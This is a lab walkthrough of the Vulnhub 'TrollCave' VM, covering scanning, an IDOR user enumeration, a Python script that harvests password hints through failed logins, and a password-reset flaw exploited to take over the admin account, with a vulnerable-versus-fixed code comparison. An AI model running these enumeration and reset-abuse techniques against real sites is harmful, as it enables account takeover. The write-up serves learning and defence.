TrollCave Boot to Root VM Walkthrough PART ONE

Introduction

Today we’ll begin compromising one of Vulnhub’s latest VMs, “TrollCave”. The author, David Yates, says that this VM aims to be as realistic as possible, i.e. it avoids the contrived scenarios which pop up in some CTFs (port knocking, MP3 file waveform analysis etc.)

The author has also stressed that a kernel exploit isn’t required to root this box, so that’ll save some time when we come to privesc the box later.

This is the first VM that has tested me to the point where I’ve had to stop and take a break. As such, this write-up only covers enumeration through to getting admin in the web app; part 2 will detail how to shell the box and continue exploitation.

Let’s go and break stuff!

NMap

Nothing hugely exciting here, there’s an NGINX webserver and an SSH server. Let’s go and poke the webserver (whilst running the usual tools against it.)

Nikto

A few interesting things pop out here. /login/ is obviously of interest to us, as is login.php. I have no idea why there’s a login.php3 and a login.asp there; that requires some investigating.

Dirb

Dirb found all the treats! There’s that weird pattern again: admin.cgi, admin.php, admin.pl… No admin.asp this time though (for some reason). Let’s fire up the app in our browser and go to town on it.

Manual enumeration

So at first glance it’s a nicely designed, well locked down blog.

All of the interesting findings from above are locked down with access control saying that you must be logged in. No obvious LFI vectors in the URLs, but there is an IDOR problem that we can use to enumerate every user in the app.

When navigating to a user’s profile page the URL changes from user/1 to user/2 etc. so we can write a little script to enumerate all users –

Yeah the script’s a little ugly but hey, I’m a programmer and sometimes it’s fun to be a bit sloppy! 😉

So we’ve got a list of all users now. We notice that when a login attempt fails, the app gives us a little password hint for that user. Let’s use this lovely data to collect all of the password hints using Burp Suite –

I used the awesome Intruder module in Burp Suite to fire a failed login for every user, then used the results-processing options (Intruder’s Grep - Extract) to pull out just the hints from the responses!
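Both steps above (the user/N IDOR walk and the per-user hint harvesting) as one added Python script. This is my code, not the author’s script or their Burp session. It assumes things the screenshots don’t show: the profile page puts the username in an <h1>, the login form is a Rails form with the hidden authenticity_token and name/password fields, and a failed login echoes “hint: …” in its response; the VM address is a placeholder. With no arguments it runs against an embedded fake site constructed for the demo, so it works offline; pass the real base URL to run it against the box.

```python
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

BASE = "http://10.0.0.5"  # assumed VM address; pass the real one on the command line

# Markup assumptions (the walkthrough shows screenshots, not HTML): the profile
# page carries the username in an <h1>, the login form has Rails' hidden
# authenticity_token, the form fields are "name"/"password", and a failed login
# echoes "hint: <text>" before a closing tag.
USER_RE = re.compile(r"<h1[^>]*>\s*([^<]+?)\s*</h1>", re.I)
TOKEN_RE = re.compile(r'name="authenticity_token"\s+value="([^"]+)"')
HINT_RE = re.compile(r"hint:?\s*([^<]+?)\s*<", re.I)


def make_fetcher():
    """Return fetch(url, form=None) -> body. A shared cookie jar keeps the
    Rails session that issued the CSRF token together with the POST that
    replays it; without that, Rails can reject the login attempt outright."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()))

    def fetch(url, form=None):
        data = urllib.parse.urlencode(form).encode() if form is not None else None
        try:
            with opener.open(url, data=data, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            # a rejected login may come back as 4xx; the body still holds the hint
            return err.read().decode("utf-8", "replace")
    return fetch


def enumerate_users(fetch, base=BASE, max_id=100, misses_allowed=3):
    """Walk /user/1, /user/2, ... (the IDOR) and map id -> username.
    Stops once `misses_allowed` consecutive ids show no profile."""
    users, misses = {}, 0
    for uid in range(1, max_id + 1):
        match = USER_RE.search(fetch(f"{base}/user/{uid}"))
        if match:
            users[uid] = match.group(1)
            misses = 0
        else:
            misses += 1
            if misses >= misses_allowed:
                break
    return users


def password_hints(fetch, usernames, base=BASE):
    """Submit a deliberately wrong password for each user and keep the hint
    the app leaks in its error response (None when no hint was found)."""
    hints = {}
    for name in usernames:
        token = TOKEN_RE.search(fetch(f"{base}/login"))
        form = {"name": name, "password": "definitely-wrong"}
        if token:
            form["authenticity_token"] = token.group(1)
        match = HINT_RE.search(fetch(f"{base}/login", form))
        hints[name] = match.group(1) if match else None
    return hints


# Constructed offline stand-in for the VM (not real TrollCave responses) so the
# script can be exercised without a target.
DEMO_HINTS = {"King": ":)", "dave": "nah lol", "dragon": "Over fire and over stone..."}


def demo_fetch(url, form=None):
    names = list(DEMO_HINTS)
    if form is not None:  # a login POST
        if form.get("authenticity_token") != "demo-token":
            return "<p>Invalid authenticity token</p>"
        return f"<p>Password hint: {DEMO_HINTS.get(form['name'], 'unknown user')}</p>"
    if url.endswith("/login"):
        return '<input type="hidden" name="authenticity_token" value="demo-token">'
    match = re.search(r"/user/(\d+)$", url)
    if match and 1 <= int(match.group(1)) <= len(names):
        return f"<h1>{names[int(match.group(1)) - 1]}</h1>"
    return "<p>No such user</p>"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        base, fetch = sys.argv[1].rstrip("/"), make_fetcher()
    else:
        base, fetch = BASE, demo_fetch
    found = enumerate_users(fetch, base)
    for name, hint in password_hints(fetch, found.values(), base).items():
        print(f"{name:15} {hint}")
```

The fetcher deliberately returns the body of 4xx responses as well, because a Rails app that renders the login form again with an error message may still do so with a non-200 status, and the hint lives in that body.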

User  Hint
King 🙂
dave nah lol
dragon Over fire and over stone…
coderguy 🙂
cooldude89 i am the dankest
Sir It’s super secure
Q Your normal password
teflon swordfish
TheDankMan 420
artemus garden
MrPotatoHead you know…
Ian a
kev mother’s maiden name
notanother (:
anybodyhome no one is
onlyme It is what it is
xer fave pronoun

And we’re done! So now we can start trying to guess some passwords using these cryptic hints..

And get nowhere. Blargh.

Password Reset Pwnage

So after looking over all of the blog posts a bit more closely, I spot one which mentions a half-implemented password reset function written in Ruby! (That likely also explains the odd login.php/login.asp and admin.pl hits from Nikto and Dirb: a Rails route is declared as /login(.:format), so a real route with any extension appended still matches, and the scanners report each variant as a separate hit.) After Googling how to do password resets in Ruby on Rails I came across this absolute belter, which led me to trying various password_reset URLs until I came across this gem (see what I did there..!)

Uh oh… That doesn’t look good does it! 😉

Let’s reset King, the SuperAdmin’s password.

Bah! It’ll still let us progress further anyway, let’s pick a member and reset their password.

Ugh! More roadblocks! Although look at that URL.. What would happen if we swapped ‘xer’ for ‘King’..?

So far so good, it’s given us a proper password reset form. Let’s add a password and see if it works.

BINGO! We’re King the Superadmin! How awesome is that?
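What just happened, modelled as an added Python example (my illustrative code, not the TrollCave app’s source, which the walkthrough never shows): a reset flow that validates the token but takes the account to change from the username in the URL lets a token issued for xer reset King, exactly as swapping the name did above. The hardened version derives the owner from the stored reset record, only cross-checks the URL’s name, consumes the token, and stores a digest rather than the raw token. The in-memory store, usernames and TTL are assumptions for the demo.

```python
import hashlib
import hmac
import secrets
import time


class ResetStore:
    """In-memory stand-in for a password_resets table (illustrative, not the
    TrollCave app's code). Only a digest of each token is stored, so a leaked
    table does not hand out usable reset links."""

    def __init__(self, ttl=3600):
        self.ttl = ttl
        self.passwords = {"King": "king-old", "xer": "xer-old"}  # demo accounts
        self.resets = {}  # sha256(token) -> (owner, expiry)

    @staticmethod
    def digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, owner):
        """What the 'forgot password' form does: mint a token for one account."""
        token = secrets.token_urlsafe(24)
        self.resets[self.digest(token)] = (owner, time.time() + self.ttl)
        return token

    def lookup(self, token):
        """Return (owner, expiry) for a live token, else None."""
        entry = self.resets.get(self.digest(token))
        if entry is None or entry[1] <= time.time():
            return None
        return entry


def reset_vulnerable(store, user_param, token, new_password):
    """Pattern consistent with the walkthrough's behaviour (hypothetical): the
    token is checked for validity, but the account to change is read from the
    user= field of the URL, which the requester controls."""
    if store.lookup(token) is None:
        return False
    store.passwords[user_param] = new_password
    return True


def reset_fixed(store, user_param, token, new_password):
    """Bind the account to the token: the owner comes from the stored reset
    record, the URL's user= field is only cross-checked, and the token is
    consumed so the link is single-use."""
    entry = store.lookup(token)
    if entry is None:
        return False
    owner, _expiry = entry
    if not hmac.compare_digest(owner.encode(), user_param.encode()):
        return False  # token was issued for somebody else: refuse
    del store.resets[store.digest(token)]
    store.passwords[owner] = new_password
    return True


def demo():
    """Replay the walkthrough's swap of xer for King against both versions."""
    vuln = ResetStore()
    fixed = ResetStore()
    swapped = reset_vulnerable(vuln, "King", vuln.issue("xer"), "pwned")
    blocked = reset_fixed(fixed, "King", fixed.issue("xer"), "pwned")
    return swapped, vuln.passwords["King"], blocked, fixed.passwords["King"]


if __name__ == "__main__":
    print(demo())  # (True, 'pwned', False, 'king-old')
```

The important line is the lookup order: a reset handler should start from the token and let it tell the server whose password is being changed, never the other way round. Rejecting a mismatch outright (rather than silently resetting the token’s real owner) also avoids turning the attempt into a denial of service against xer.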

Conclusion

I’ve decided to park this VM for now, until my skills improve a little more and I’m able to fully compromise this box. Part 2 will be written and posted within the next few months, all being well.

Huge thanks to this box’s creator (link in Introduction) this is a really unique challenge which I’ve thoroughly enjoyed so far.

 
